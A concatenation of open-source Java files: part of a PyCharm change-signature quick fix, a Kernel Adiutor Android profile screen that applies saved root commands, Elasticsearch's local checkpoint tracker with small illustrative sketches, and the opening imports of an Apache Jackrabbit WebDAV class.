final List<Pair<Integer, PyParameterInfo>> newParameters = new ArrayList<>();
final TypeEvalContext context = TypeEvalContext.userInitiated(function.getProject(), callSiteExpression.getContainingFile());
final Set<String> usedParamNames = new HashSet<>();
for (PyExpression arg : mapping.getUnmappedArguments()) {
if (arg instanceof PyKeywordArgument) {
final PyExpression value = ((PyKeywordArgument)arg).getValueExpression();
final String valueText = value != null ? value.getText() : "";
newParameters.add(Pair.create(parameters.length - 1,
new PyParameterInfo(NEW_PARAMETER, ((PyKeywordArgument)arg).getKeyword(), valueText, true)));
}
else {
final String paramName = generateParameterName(arg, function, usedParamNames, context);
newParameters.add(Pair.create(positionalParamAnchor, new PyParameterInfo(NEW_PARAMETER, paramName, arg.getText(), false)));
usedParamNames.add(paramName);
}
}
return new PyChangeSignatureQuickFix(function, newParameters, mapping.getCallSiteExpression());
}
@NotNull
public static PyChangeSignatureQuickFix forMismatchingMethods(@NotNull PyFunction function, @NotNull PyFunction complementary) {
final int paramLength = function.getParameterList().getParameters().length;
final int complementaryParamLength = complementary.getParameterList().getParameters().length;
final List<Pair<Integer, PyParameterInfo>> extraParams;
if (complementaryParamLength > paramLength) {
extraParams = Collections.singletonList(Pair.create(paramLength - 1, new PyParameterInfo(NEW_PARAMETER, "**kwargs", "", false)));
}
else {
extraParams = Collections.emptyList();
}
return new PyChangeSignatureQuickFix(function, extraParams, null);
}
private final List<Pair<Integer, PyParameterInfo>> myExtraParameters;
@Nullable private final SmartPsiElementPointer<PyCallSiteExpression> myOriginalCallSiteExpression;
/**
* @param extraParameters new parameters anchored by indexes of the existing parameters they should be inserted <em>after</em>
* (-1 in case they should precede the first parameter)
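   * <p>
   * For instance (with hypothetical new parameters {@code p0} and {@code p1}), applying
   * {@code [(-1, p0), (0, p1)]} to an existing signature {@code f(a, b)} yields the order {@code (p0, a, p1, b)}.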
*/
private PyChangeSignatureQuickFix(@NotNull PyFunction function,
@NotNull List<Pair<Integer, PyParameterInfo>> extraParameters,
@Nullable PyCallSiteExpression expression) {
super(function);
myExtraParameters = ContainerUtil.sorted(extraParameters, Comparator.comparingInt(p -> p.getFirst()));
if (expression != null) {
myOriginalCallSiteExpression = SmartPointerManager.getInstance(function.getProject()).createSmartPsiElementPointer(expression);
}
else {
myOriginalCallSiteExpression = null;
}
}
@Override
@NotNull
public String getFamilyName() {
return PyBundle.message("QFIX.NAME.change.signature");
}
@NotNull
@Override
public String getText() {
final PyFunction function = getFunction();
if (function == null) {
return getFamilyName();
}
final String params = StringUtil.join(createMethodDescriptor(function).getParameters(), info -> info.isNew() ? PyBundle
.message("QFIX.bold.html.text", info.getName()) : info.getName(), ", ");
final String message = PyBundle.message("QFIX.change.signature.of", StringUtil.notNullize(function.getName()) + "(" + params + ")");
return XmlStringUtil.wrapInHtml(message);
}
@Nullable
private PyFunction getFunction() {
return (PyFunction)getStartElement();
}
@Override
public void invoke(@NotNull Project project, @NotNull PsiFile file, @NotNull PsiElement startElement, @NotNull PsiElement endElement) {
final PyFunction function = getFunction();
final PyMethodDescriptor descriptor = createMethodDescriptor(function);
final PyChangeSignatureDialog dialog = new PyChangeSignatureDialog(project, descriptor) {
// Similar to JavaChangeSignatureDialog.createAndPreselectNew()
@Override
protected int getSelectedIdx() {
return (int)StreamEx.of(getParameters()).indexOf(info -> info.getOldIndex() < 0).orElse(super.getSelectedIdx());
}
};
final PyCallSiteExpression originalCallSite = myOriginalCallSiteExpression != null ? myOriginalCallSiteExpression.getElement() : null;
try {
if (originalCallSite != null) {
originalCallSite.putUserData(CHANGE_SIGNATURE_ORIGINAL_CALL, true);
}
if (ApplicationManager.getApplication().isUnitTestMode()) {
try {
dialog.createRefactoringProcessor().run();
}
finally {
Disposer.dispose(dialog.getDisposable());
}
}
else {
dialog.show();
}
}
finally {
if (originalCallSite != null) {
originalCallSite.putUserData(CHANGE_SIGNATURE_ORIGINAL_CALL, null);
}
}
}
@NotNull
private static String generateParameterName(@NotNull PyExpression argumentValue,
@NotNull PyFunction function,
@NotNull Set<String> usedParameterNames,
@NotNull TypeEvalContext context) {
final Collection<String> suggestions = new LinkedHashSet<>();
final PyCallExpression callExpr = as(argumentValue, PyCallExpression.class);
final PyElement referenceElem = as(callExpr != null ? callExpr.getCallee() : argumentValue, PyReferenceExpression.class);
if (referenceElem != null) {
suggestions.addAll(NameSuggesterUtil.generateNames(referenceElem.getText()));
}
if (suggestions.isEmpty()) {
PyType type = context.getType(argumentValue);
if (type instanceof PyUnionType) {
type = ContainerUtil.find(((PyUnionType)type).getMembers(), Conditions.instanceOf(PyClassType.class));
}
final String typeName = type != null && type.getName() != null ? type.getName() : "object";
suggestions.addAll(NameSuggesterUtil.generateNamesByType(typeName));
}
final String shortestName = Collections.min(suggestions, Comparator.comparingInt(String::length));
String result = shortestName;
int counter = 1;
while (!PyRefactoringUtil.isValidNewName(result, function.getStatementList()) || usedParameterNames.contains(result)) {
result = shortestName + counter;
counter++;
}
return result;
}
@NotNull
private PyMethodDescriptor createMethodDescriptor(final PyFunction function) {
return new PyMethodDescriptor(function) {
@Override
public List<PyParameterInfo> getParameters() {
final List<PyParameterInfo> result = new ArrayList<>();
final List<PyParameterInfo> originalParams = super.getParameters();
final PeekingIterator<Pair<Integer, PyParameterInfo>> extra = Iterators.peekingIterator(myExtraParameters.iterator());
while (extra.hasNext() && extra.peek().getFirst() < 0) {
result.add(extra.next().getSecond());
}
for (int i = 0; i < originalParams.size(); i++) {
result.add(originalParams.get(i));
while (extra.hasNext() && extra.peek().getFirst() == i) {
result.add(extra.next().getSecond());
}
}
return result;
}
};
}
@Nullable
@Override
public PsiElement getElementToMakeWritable(@NotNull PsiFile currentFile) {
return getFunction();
}
@Override
public boolean startInWriteAction() {
return false;
}
}
|
|
/*
* Copyright (C) 2015 Willi Ye
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.grarak.kerneladiutor.fragments.tools;
import android.appwidget.AppWidgetManager;
import android.content.ComponentName;
import android.content.DialogInterface;
import android.content.Intent;
import android.content.res.Configuration;
import android.Manifest;
import android.os.Build;
import android.os.Bundle;
import android.os.Environment;
import android.support.v4.content.ContextCompat;
import android.support.v7.app.AlertDialog;
import android.support.v7.widget.AppCompatButton;
import android.support.v7.widget.AppCompatCheckBox;
import android.support.v7.widget.AppCompatEditText;
import android.support.v7.widget.RecyclerView;
import android.util.Log;
import android.text.InputType;
import android.view.Gravity;
import android.view.View;
import android.widget.LinearLayout;
import android.widget.ScrollView;
import android.widget.TextView;
import com.grarak.kerneladiutor.R;
import com.grarak.kerneladiutor.elements.DAdapter;
import com.grarak.kerneladiutor.elements.cards.CardViewItem;
import com.grarak.kerneladiutor.elements.cards.InformationCardView;
import com.grarak.kerneladiutor.fragments.RecyclerViewFragment;
import com.grarak.kerneladiutor.services.PerAppMonitor;
import com.grarak.kerneladiutor.services.ProfileWidget;
import com.grarak.kerneladiutor.tasker.AddProfileActivity;
import com.grarak.kerneladiutor.utils.GetPermission;
import com.grarak.kerneladiutor.utils.Constants;
import com.grarak.kerneladiutor.utils.Utils;
import com.grarak.kerneladiutor.utils.database.CommandDB;
import com.grarak.kerneladiutor.utils.database.ProfileDB;
import com.grarak.kerneladiutor.utils.root.Control;
import com.grarak.kerneladiutor.utils.tools.Per_App;
import com.grarak.kerneladiutor.utils.root.RootUtils;
import com.grarak.kerneladiutor.utils.root.RootFile;
import java.io.File;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
/**
* Created by willi on 31.01.15.
*/
public class ProfileFragment extends RecyclerViewFragment {
private static final String TAG = ProfileFragment.class.getSimpleName();
public static ProfileFragment newInstance() {
Bundle args = new Bundle();
ProfileFragment fragment = new ProfileFragment();
fragment.taskerMode = true;
fragment.setArguments(args);
return fragment;
}
private TextView title;
private boolean taskerMode;
private AlertDialog.Builder mPerAppDialog;
@Override
public boolean showApplyOnBoot() {
return false;
}
@Override
public int getSpan() {
int orientation = Utils.getScreenOrientation(getActivity());
if (Utils.isTablet(getActivity()))
return orientation == Configuration.ORIENTATION_LANDSCAPE ? 6 : 5;
return orientation == Configuration.ORIENTATION_LANDSCAPE ? 4 : 3;
}
@Override
public RecyclerView getRecyclerView() {
View view = getParentView(R.layout.fab_recyclerview);
title = (TextView) view.findViewById(R.id.title_view);
return (RecyclerView) view.findViewById(R.id.recycler_view);
}
@Override
public void preInit(Bundle savedInstanceState) {
super.preInit(savedInstanceState);
String ppath = (Environment.getExternalStorageDirectory().getPath() + "/KA_profiles/");
if (!Utils.existFile(ppath)) {
RootFile dir = new RootFile(ppath);
dir.mkdir();
}
if (taskerMode) {
fabView.setVisibility(View.GONE);
fabView = null;
return;
}
fabView.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
new GetPermission(getActivity(), Manifest.permission.WRITE_EXTERNAL_STORAGE).ask(new GetPermission.PermissionCallBack() {
@Override
public void granted() {
ProfileDialog();
}
@Override
public void denied() {
Utils.request_writeexternalstorage(getActivity());
Utils.toast(getString(R.string.no_permission), getActivity());
}
});
}
});
}
@Override
public void init(Bundle savedInstanceState) {
super.init(savedInstanceState);
create();
}
private void create() {
removeAllViews();
final InformationCardView.DInformationCard mInformationCard = new InformationCardView.DInformationCard();
mInformationCard.setText(getString(R.string.profile_information));
addView(mInformationCard);
ProfileDB profileDB = new ProfileDB(getActivity());
if (profileDB.updateDB(getActivity()) == 1) {
removeAllViews();
profileDB = new ProfileDB(getActivity());
}
        final List<ProfileDB.ProfileItem> profileItems = profileDB.getAllProfiles();
for (int i = 0; i < profileItems.size(); i++) {
CardViewItem.DCardView mProfileCard = new CardViewItem.DCardView();
mProfileCard.setDescription(profileItems.get(i).getName());
final int position = i;
mProfileCard.setOnDCardListener(new CardViewItem.DCardView.OnDCardListener() {
@Override
public void onClick(CardViewItem.DCardView dCardView) {
if (taskerMode) {
try {
((AddProfileActivity) getActivity()).finish(profileItems.get(position).getName(),
profileItems.get(position).getCommands());
return;
} catch (ClassCastException ignored) {}
}
new AlertDialog.Builder(getActivity(),
(Utils.DARKTHEME ? R.style.AlertDialogStyleDark : R.style.AlertDialogStyleLight))
.setTitle(profileItems.get(position).getName())
.setItems(getResources().getStringArray(R.array.profile_menu),
new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
ProfileDB.ProfileItem profileItem = profileItems.get(position);
switch (which) {
case 0:
                                        List<String> paths = profileItem.getPath();
for (int i = 0; i < paths.size(); i++) {
Control.commandSaver(getActivity(), paths.get(i),
profileItem.getCommands().get(i));
RootUtils.runCommand(profileItem.getCommands().get(i));
}
break;
case 1:
ProfileDB profileDB = new ProfileDB(getActivity());
profileDB.delete(position);
profileDB.commit();
getHandler().post(new Runnable() {
@Override
public void run() {
create();
}
});
break;
case 2:
StringBuilder s = new StringBuilder();
for (String command: profileItem.getCommands())
s.append(command).append("\n");
s.setLength(s.length() - 1);
new AlertDialog.Builder(getActivity()).setMessage(s.toString()).show();
break;
case 3:
dialog.dismiss();
PerAppDialog(profileItems.get(position).getID());
break;
}
}
}).show();
}
});
addView(mProfileCard);
}
getActivity().runOnUiThread(new Runnable() {
@Override
public void run() {
if (isAdded()) {
title.setText(getCount() < 2 ? getString(R.string.no_profiles) : getString(R.string.items_found, (getCount() - 1)));
}
}
});
AppWidgetManager appWidgetManager = AppWidgetManager.getInstance(getActivity());
        int[] appWidgetIds = appWidgetManager.getAppWidgetIds(new ComponentName(getActivity(), ProfileWidget.class));
appWidgetManager.notifyAppWidgetViewDataChanged(appWidgetIds, R.id.profile_list);
}
private void PerAppDialog(String id) {
if (!Per_App.isAccessibilityEnabled(getActivity(), PerAppMonitor.accessibilityId)) {
startActivityForResult(new Intent(android.provider.Settings.ACTION_ACCESSIBILITY_SETTINGS), 0);
} else {
mPerAppDialog = new AlertDialog.Builder(getActivity());
mPerAppDialog.setTitle(R.string.per_app_title);
mPerAppDialog.setCancelable(true);
            final List<Per_App.App> apps = Per_App.getInstalledApps(getActivity());
final String[] packagelist = Per_App.getPackageNames(apps);
final String[] mapplist = Per_App.getAppNames(apps);
final String profile_id = id;
            final List<Integer> mSelectedApps = new ArrayList<Integer>();
            final List<Integer> mDeSelectedApps = new ArrayList<Integer>();
final boolean[] checkedValues = Per_App.getExistingSelections(packagelist, profile_id, getActivity());
// Specify the list array, the items to be selected by default (null for none),
// and the listener through which to receive callbacks when items are selected
mPerAppDialog.setMultiChoiceItems(mapplist, checkedValues,
new DialogInterface.OnMultiChoiceClickListener() {
@Override
public void onClick(DialogInterface dialog, int which,
boolean isChecked) {
if (isChecked) {
// If the user checked the item, add it to the selected items
mSelectedApps.add(which);
}
if (!isChecked) {
mDeSelectedApps.add(which);
}
if (!isChecked && mSelectedApps.contains(which)) {
// Else, if the item is already in the array, remove it
mSelectedApps.remove(Integer.valueOf(which));
}
}
});
// Set the action buttons
mPerAppDialog.setPositiveButton(R.string.ok, new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int id) {
// User clicked OK, so save the mSelectedItems results somewhere
// or return them to the component that opened the dialog
if (mSelectedApps != null) {
for (int i = 0; i < mSelectedApps.size(); i++) {
int y = mSelectedApps.get(i);
String packageName = packagelist[y];
Log.d(TAG, "Saving " + packageName + " to " + profile_id);
Per_App.save_app(packageName, profile_id, getActivity());
}
}
if (mDeSelectedApps != null) {
for (int i = 0; i < mDeSelectedApps.size(); i++) {
int y = mDeSelectedApps.get(i);
Per_App.remove_app(packagelist[y], profile_id, getActivity());
}
}
}
});
mPerAppDialog.setNegativeButton(R.string.cancel, new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int id) {
}
});
mPerAppDialog.create();
mPerAppDialog.show();
}
}
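// Builds the "new profile" dialog: the user names the profile and picks the sections whose
// saved commands should be included; the result is stored as a new ProfileDB entry (or
// replaces an existing profile of the same name after confirmation).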
private void ProfileDialog() {
final List<CommandDB.CommandItem> commandItems = new CommandDB(getActivity()).getAllCommands();
LinearLayout linearLayout = new LinearLayout(getActivity());
linearLayout.setOrientation(LinearLayout.VERTICAL);
linearLayout.setGravity(Gravity.CENTER);
linearLayout.setPadding(30, 20, 30, 20);
TextView descriptionText = new TextView(getActivity());
descriptionText.setText(getString(R.string.profile_description));
linearLayout.addView(descriptionText);
final AppCompatEditText profileName = new AppCompatEditText(getActivity());
profileName.setTextColor(ContextCompat.getColor(getActivity(), Utils.DARKTHEME ? R.color.white : R.color.black));
profileName.setHint(getString(R.string.name));
profileName.setInputType(InputType.TYPE_CLASS_TEXT);
linearLayout.addView(profileName);
ScrollView scrollView = new ScrollView(getActivity());
scrollView.setPadding(0, 0, 0, 10);
linearLayout.addView(scrollView);
LinearLayout checkBoxLayout = new LinearLayout(getActivity());
checkBoxLayout.setOrientation(LinearLayout.VERTICAL);
scrollView.addView(checkBoxLayout);
AppCompatButton selectAllButton = new AppCompatButton(getActivity());
selectAllButton.setText(getString(R.string.select_all));
checkBoxLayout.addView(selectAllButton);
boolean load = true;
String start = getString(R.string.kernel);
String stop = getString(R.string.downloads);
final LinkedHashMap<Class, AppCompatCheckBox> items = new LinkedHashMap<>();
for (DAdapter.DView item: Constants.VISIBLE_ITEMS) {
if (item.getTitle() != null) {
if (item.getTitle().equals(start)) load = false;
if (item.getTitle().equals(stop)) load = true;
if (item.getFragment() != null && !load) {
AppCompatCheckBox checkBox = new AppCompatCheckBox(getActivity());
checkBox.setText(item.getTitle());
checkBoxLayout.addView(checkBox);
items.put(item.getFragment().getClass(), checkBox);
}
}
}
if (items.size() < 1) {
Utils.toast(getString(R.string.removed_all_sections), getActivity());
return;
}
selectAllButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
for (Object checkbox: items.values().toArray())
((AppCompatCheckBox) checkbox).setChecked(true);
}
});
AlertDialog.Builder dialog = new AlertDialog.Builder(getActivity(),
(Utils.DARKTHEME ? R.style.AlertDialogStyleDark : R.style.AlertDialogStyleLight));
dialog.setView(linearLayout).setNegativeButton(getString(R.string.cancel),
new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {}
}).setPositiveButton(getString(R.string.ok),
new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
new Thread(new Runnable() {
@Override
public void run() {
final ProfileDB profileDB = new ProfileDB(getActivity());
List<String> applys = new ArrayList<>();
for (int i = 0; i < items.size(); i++)
if (((AppCompatCheckBox) items.values().toArray()[i]).isChecked())
applys.addAll(Utils.getApplys((Class) items.keySet().toArray()[i]));
final LinkedHashMap<String, String> commands = new LinkedHashMap<>();
for (CommandDB.CommandItem commandItem: commandItems)
for (String s: applys) {
String path = commandItem.getPath();
if (s.contains(path) || path.contains(s))
commands.put(path, commandItem.getCommand());
}
final String name = profileName.getText().toString();
if (!name.isEmpty() && commands.size() > 0 && profileDB.containProfile(name)) {
getHandler().post(new Runnable() {
@Override
public void run() {
AlertDialog.Builder replaceDialog = new AlertDialog.Builder(getActivity(),
(Utils.DARKTHEME ? R.style.AlertDialogStyleDark : R.style.AlertDialogStyleLight));
replaceDialog.setTitle(getString(R.string.replace_profile, name));
replaceDialog.setNegativeButton(getString(R.string.cancel),
new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {}
}).setPositiveButton(getString(R.string.ok),
new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
profileDB.delete(profileDB.getProfileId(name));
profileDB.putProfile(name, commands);
profileDB.commit();
}
}).show();
}
});
} else if (!name.isEmpty() && commands.size() > 0) {
    profileDB.putProfile(name, commands);
}
profileDB.commit();
getHandler().post(new Runnable() {
@Override
public void run() {
if (name.isEmpty())
Utils.toast(getString(R.string.empty_name), getActivity());
else if (commands.size() < 1)
Utils.toast(getString(R.string.no_settings), getActivity());
else create();
}
});
}
}).start();
}
}).show();
}
}
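// A minimal, self-contained sketch of the multi-choice selection pattern that PerAppDialog()
// above builds on (AlertDialog.Builder#setMultiChoiceItems plus two lists tracking what was
// checked and unchecked). Class, method and parameter names here are illustrative only; the
// persistence step is left as a comment because it depends on app-specific helpers.
import android.app.AlertDialog;
import android.content.Context;
import android.content.DialogInterface;
import java.util.ArrayList;
import java.util.List;
final class MultiChoiceSketch {
    static void show(Context context, String[] labels, boolean[] checked) {
        final List<Integer> selected = new ArrayList<>();
        final List<Integer> deselected = new ArrayList<>();
        new AlertDialog.Builder(context)
                .setMultiChoiceItems(labels, checked, new DialogInterface.OnMultiChoiceClickListener() {
                    @Override
                    public void onClick(DialogInterface dialog, int which, boolean isChecked) {
                        if (isChecked) {
                            // Newly checked entries are remembered for saving.
                            selected.add(which);
                        } else {
                            // Unchecked entries are remembered for removal and dropped from 'selected'.
                            deselected.add(which);
                            selected.remove(Integer.valueOf(which));
                        }
                    }
                })
                .setPositiveButton(android.R.string.ok, new DialogInterface.OnClickListener() {
                    @Override
                    public void onClick(DialogInterface dialog, int id) {
                        // Persist 'selected' and discard 'deselected' here, as the fragment does
                        // with Per_App.save_app / Per_App.remove_app.
                    }
                })
                .show();
    }
}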
|
|
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.elasticsearch.index.seqno;
import org.apache.lucene.util.FixedBitSet;
import org.elasticsearch.common.SuppressForbidden;
import org.elasticsearch.common.settings.Setting;
import org.elasticsearch.index.IndexSettings;
import java.util.LinkedList;
/**
* This class generates sequence numbers and keeps track of the so-called "local checkpoint" which is the highest number for which all
* previous sequence numbers have been processed (inclusive).
*/
public class LocalCheckpointTracker {
/**
* We keep a bit for each sequence number that is still pending. To optimize allocation, we do so in multiple arrays, allocating them on
* demand and cleaning them up once completed. This setting controls the size of the arrays.
*/
public static Setting<Integer> SETTINGS_BIT_ARRAYS_SIZE =
Setting.intSetting("index.seq_no.checkpoint.bit_arrays_size", 1024, 4, Setting.Property.IndexScope);
/**
* An ordered list of bit arrays representing pending sequence numbers. The list is "anchored" in {@link #firstProcessedSeqNo} which
* marks the sequence number the first bit in the first array corresponds to.
*/
final LinkedList<FixedBitSet> processedSeqNo = new LinkedList<>();
/**
* The size of each bit set representing processed sequence numbers.
*/
private final int bitArraysSize;
/**
* The sequence number that the first bit in the first array corresponds to.
*/
long firstProcessedSeqNo;
/**
* The current local checkpoint, i.e., all sequence numbers no more than this number have been completed.
*/
volatile long checkpoint;
/**
* The next available sequence number.
*/
private volatile long nextSeqNo;
/**
* Initialize the local checkpoint service. The {@code maxSeqNo} should be set to the last sequence number assigned, or
* {@link SequenceNumbersService#NO_OPS_PERFORMED} and {@code localCheckpoint} should be set to the last known local checkpoint,
* or {@link SequenceNumbersService#NO_OPS_PERFORMED}.
*
* @param indexSettings the index settings
* @param maxSeqNo the last sequence number assigned, or {@link SequenceNumbersService#NO_OPS_PERFORMED}
* @param localCheckpoint the last known local checkpoint, or {@link SequenceNumbersService#NO_OPS_PERFORMED}
*/
public LocalCheckpointTracker(final IndexSettings indexSettings, final long maxSeqNo, final long localCheckpoint) {
if (localCheckpoint < 0 && localCheckpoint != SequenceNumbersService.NO_OPS_PERFORMED) {
throw new IllegalArgumentException(
"local checkpoint must be non-negative or [" + SequenceNumbersService.NO_OPS_PERFORMED + "] "
+ "but was [" + localCheckpoint + "]");
}
if (maxSeqNo < 0 && maxSeqNo != SequenceNumbersService.NO_OPS_PERFORMED) {
throw new IllegalArgumentException(
"max seq. no. must be non-negative or [" + SequenceNumbersService.NO_OPS_PERFORMED + "] but was [" + maxSeqNo + "]");
}
bitArraysSize = SETTINGS_BIT_ARRAYS_SIZE.get(indexSettings.getSettings());
firstProcessedSeqNo = localCheckpoint == SequenceNumbersService.NO_OPS_PERFORMED ? 0 : localCheckpoint + 1;
nextSeqNo = maxSeqNo == SequenceNumbersService.NO_OPS_PERFORMED ? 0 : maxSeqNo + 1;
checkpoint = localCheckpoint;
}
/**
* Issue the next sequence number.
*
* @return the next assigned sequence number
*/
synchronized long generateSeqNo() {
return nextSeqNo++;
}
/**
* Marks the processing of the provided sequence number as completed and updates the checkpoint if possible.
*
* @param seqNo the sequence number to mark as completed
*/
public synchronized void markSeqNoAsCompleted(final long seqNo) {
// make sure we track highest seen sequence number
if (seqNo >= nextSeqNo) {
nextSeqNo = seqNo + 1;
}
if (seqNo <= checkpoint) {
// this is possible during recovery where we might replay an operation that was also replicated
return;
}
final FixedBitSet bitSet = getBitSetForSeqNo(seqNo);
final int offset = seqNoToBitSetOffset(seqNo);
bitSet.set(offset);
if (seqNo == checkpoint + 1) {
updateCheckpoint();
}
}
/**
* The current checkpoint which can be advanced by {@link #markSeqNoAsCompleted(long)}.
*
* @return the current checkpoint
*/
public long getCheckpoint() {
return checkpoint;
}
/**
* The maximum sequence number issued so far.
*
* @return the maximum sequence number
*/
long getMaxSeqNo() {
return nextSeqNo - 1;
}
/**
* constructs a {@link SeqNoStats} object, using local state and the supplied global checkpoint
*
* @implNote this is needed to make sure the local checkpoint and max seq no are consistent
*/
synchronized SeqNoStats getStats(final long globalCheckpoint) {
return new SeqNoStats(getMaxSeqNo(), getCheckpoint(), globalCheckpoint);
}
/**
* Waits for all operations up to the provided sequence number to complete.
*
* @param seqNo the sequence number that the checkpoint must advance to before this method returns
* @throws InterruptedException if the thread was interrupted while blocking on the condition
*/
@SuppressForbidden(reason = "Object#wait")
synchronized void waitForOpsToComplete(final long seqNo) throws InterruptedException {
while (checkpoint < seqNo) {
// notified by updateCheckpoint
this.wait();
}
}
/**
* Moves the checkpoint to the last consecutively processed sequence number. This method assumes that the sequence number following the
* current checkpoint is processed.
*/
@SuppressForbidden(reason = "Object#notifyAll")
private void updateCheckpoint() {
assert Thread.holdsLock(this);
assert checkpoint < firstProcessedSeqNo + bitArraysSize - 1 :
"checkpoint should be below the end of the first bit set (o.w. current bit set is completed and shouldn't be there)";
assert getBitSetForSeqNo(checkpoint + 1) == processedSeqNo.getFirst() :
"checkpoint + 1 doesn't point to the first bit set (o.w. current bit set is completed and shouldn't be there)";
assert getBitSetForSeqNo(checkpoint + 1).get(seqNoToBitSetOffset(checkpoint + 1)) :
"updateCheckpoint is called but the bit following the checkpoint is not set";
try {
// keep it simple for now, get the checkpoint one by one; in the future we can optimize and read words
FixedBitSet current = processedSeqNo.getFirst();
do {
checkpoint++;
// the checkpoint always falls in the first bit set or just before. If it falls
// on the last bit of the current bit set, we can clean it.
if (checkpoint == firstProcessedSeqNo + bitArraysSize - 1) {
processedSeqNo.removeFirst();
firstProcessedSeqNo += bitArraysSize;
assert checkpoint - firstProcessedSeqNo < bitArraysSize;
current = processedSeqNo.peekFirst();
}
} while (current != null && current.get(seqNoToBitSetOffset(checkpoint + 1)));
} finally {
// notifies waiters in waitForOpsToComplete
this.notifyAll();
}
}
/**
* Return the bit array for the provided sequence number, possibly allocating a new array if needed.
*
* @param seqNo the sequence number to obtain the bit array for
* @return the bit array corresponding to the provided sequence number
*/
private FixedBitSet getBitSetForSeqNo(final long seqNo) {
assert Thread.holdsLock(this);
assert seqNo >= firstProcessedSeqNo : "seqNo: " + seqNo + " firstProcessedSeqNo: " + firstProcessedSeqNo;
final long bitSetOffset = (seqNo - firstProcessedSeqNo) / bitArraysSize;
if (bitSetOffset > Integer.MAX_VALUE) {
throw new IndexOutOfBoundsException(
"sequence number too high; got [" + seqNo + "], firstProcessedSeqNo [" + firstProcessedSeqNo + "]");
}
while (bitSetOffset >= processedSeqNo.size()) {
processedSeqNo.add(new FixedBitSet(bitArraysSize));
}
return processedSeqNo.get((int) bitSetOffset);
}
/**
* Obtain the position in the bit array corresponding to the provided sequence number. The bit array corresponding to the sequence
* number can be obtained via {@link #getBitSetForSeqNo(long)}.
*
* @param seqNo the sequence number to obtain the position for
* @return the position in the bit array corresponding to the provided sequence number
*/
private int seqNoToBitSetOffset(final long seqNo) {
assert Thread.holdsLock(this);
assert seqNo >= firstProcessedSeqNo;
return ((int) (seqNo - firstProcessedSeqNo)) % bitArraysSize;
}
}
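// A minimal standalone model of the checkpoint-advance rule documented above: one bit per
// completed sequence number, and the checkpoint only moves forward over a contiguous run of
// completed numbers. It deliberately does not use the Elasticsearch classes; the class name,
// the single java.util.BitSet and the int-sized sequence numbers are simplifications for
// illustration.
import java.util.BitSet;
final class CheckpointModelSketch {
    private final BitSet processed = new BitSet();
    private long checkpoint = -1; // analogous to "no ops performed"
    synchronized void markCompleted(long seqNo) {
        processed.set((int) seqNo);
        // Advance only while the next sequence number has already been processed.
        while (processed.get((int) (checkpoint + 1))) {
            checkpoint++;
        }
    }
    synchronized long checkpoint() {
        return checkpoint;
    }
    public static void main(String[] args) {
        CheckpointModelSketch tracker = new CheckpointModelSketch();
        tracker.markCompleted(0);
        tracker.markCompleted(2);                 // out of order: a gap remains at 1
        System.out.println(tracker.checkpoint()); // 0
        tracker.markCompleted(1);                 // gap filled
        System.out.println(tracker.checkpoint()); // 2
    }
}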
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.jackrabbit.webdav.jcr;
import org.apache.jackrabbit.commons.webdav.JcrValueType;
import org.apache.jackrabbit.commons.xml.SerializingContentHandler;
import org.apache.jackrabbit.server.io.IOUtil;
import org.apache.jackrabbit.webdav.DavException;
import org.apache.jackrabbit.webdav.DavResource;
import org.apache.jackrabbit.webdav.DavResourceFactory;
import org.apache.jackrabbit.webdav.DavResourceIterator;
import org.apache.jackrabbit.webdav.DavResourceIteratorImpl;
import org.apache.jackrabbit.webdav.DavResourceLocator;
import org.apache.jackrabbit.webdav.DavServletResponse;
import org.apache.jackrabbit.webdav.MultiStatusResponse;
import org.apache.jackrabbit.webdav.io.InputContext;
import org.apache.jackrabbit.webdav.io.OutputContext;
import org.apache.jackrabbit.webdav.jcr.property.JcrDavPropertyNameSet;
import org.apache.jackrabbit.webdav.jcr.property.LengthsProperty;
import org.apache.jackrabbit.webdav.jcr.property.ValuesProperty;
import org.apache.jackrabbit.webdav.lock.ActiveLock;
import org.apache.jackrabbit.webdav.lock.Scope;
import org.apache.jackrabbit.webdav.lock.Type;
import org.apache.jackrabbit.webdav.property.DavProperty;
import org.apache.jackrabbit.webdav.property.DavPropertyName;
import org.apache.jackrabbit.webdav.property.DavPropertyNameSet;
import org.apache.jackrabbit.webdav.property.DefaultDavProperty;
import org.apache.jackrabbit.webdav.property.PropEntry;
import org.apache.jackrabbit.webdav.xml.DomUtil;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.w3c.dom.Document;
import org.xml.sax.ContentHandler;
